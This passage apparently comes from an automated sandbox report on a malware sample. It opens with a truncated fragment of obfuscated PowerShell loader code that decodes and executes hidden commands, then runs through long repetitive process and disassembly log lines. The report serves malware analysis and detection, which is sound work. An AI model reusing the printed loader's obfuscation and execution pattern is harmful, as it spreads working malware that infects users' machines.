uA.aLFa:Tre .VdeaInS TiOpoImNLeeA.rInS c=Re$EyEF.N NVT,:.aaGapUnp AdSlA ft A ,+ o$ mbee DSti Ic ha KTKoEGys');Satsstatistikken (Kommaernes 'In$.igKoLVaOOvbUnASwlOr: riInNStuJanMaCNiTHou VoblU SsSa= M$SlmbeU PlGlt Pi RLIlOLoblruM,l aaFot ZEAr.UdsFlPCrL Fi lt A(Ja$c,TImUBoNA,nK,ENel eIExNIngO,)');Satsstatistikken (Kommaernes $Oaklingnddragelses);$Multilobulate=$Inunctuous[0];$Pressurized=(Kommaernes 'Ci$TiGPolIsOTibU.ADrLf :Fod OeFofP rB O Tc k =S NS,eGiwMu-CyoWhBRyJ eArC Otdy AfSSvySpS HT GeOvm K. B$ResLePUnISyTBoE KF euFrlFaL eWis ,t');Satsstatistikken ($Pressurized);Satsstatistikken (Kommaernes 'De$Swd eUnfPar FoF c.rkH,. rHUle IaNad aePrrS,sDg[Tr$.aEF nTrkSue Sm TnMud sUn]S,=Fo$L gSte.edKve s UkSci anTadMae lnSee');$Stoikerne=Kommaernes 'S,$sod LeDyfI rNeo .ccakFa.VaDBroPaw anFrlLaoFoa TdC F ri,olBieDo(C $DaMtuu Kl Lt Oi Ol AoO b Iu ml naUotBieEr,.a$ ,H vnoi,xr,iv,ue plSubD,e fvSng HeEnlS sEneIlr,esPh)';$Hvirvelbevgelsers=$Evasioners;Satsstatistikken (Kommaernes ' o$ vGalLAnoN.b faGaL B: Sh uuAnsBaeE,RkoERadBre eSPr= F(UdTF.e ,SReTSi-DiP AviTG HSk Pr$ nhHiVwaIPrr.oVDeE,jL B CESivNogfoeFlLSvsJoe,crSpSSk)');while (!$huseredes) {Satsstatistikken (Kommaernes 'Uk$ jgAklpeoLabOdaI lEv:YaH LaA,lHusEkh uMagFygSke A=te$ReMU.iA,sDyt dnRek Pt') ;Satsstatistikken $Stoikerne;Satsstatistikken (Kommaernes 'Des .TMaaDrrSkt s- RJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A0C58 push eax; retf 6_2_00007FFD9B8A0D4D
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A0CD3 push eax; retf 6_2_00007FFD9B8A0D4D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00356012 push 00000038h; iretd 20_3_0035601D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00355606 pushad ; retf 20_3_00355619
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_0035225D push eax; ret 20_3_0035225F
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_003558BC pushad ; ret 20_3_003558C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_0035588E push eax; iretd 20_3_0035589D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_003528ED push ebx; ret 20_3_003528E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_003518C0 push ebp; retf 20_3_003518C1
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00354920 push 0000002Eh; iretd 20_3_00354922
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00355F0C push es; iretd 20_3_00355F0D
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00351179 push FFFFFF82h; iretd 20_3_0035117B
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_0035278B push ebx; ret 20_3_003528E4
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00355FEE push FFFFFFD2h; retf 20_3_00356011
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_3_00350FEA push eax; ret 20_3_00350FF5
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D912D0 push eax; ret 20_2_04D912FE
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
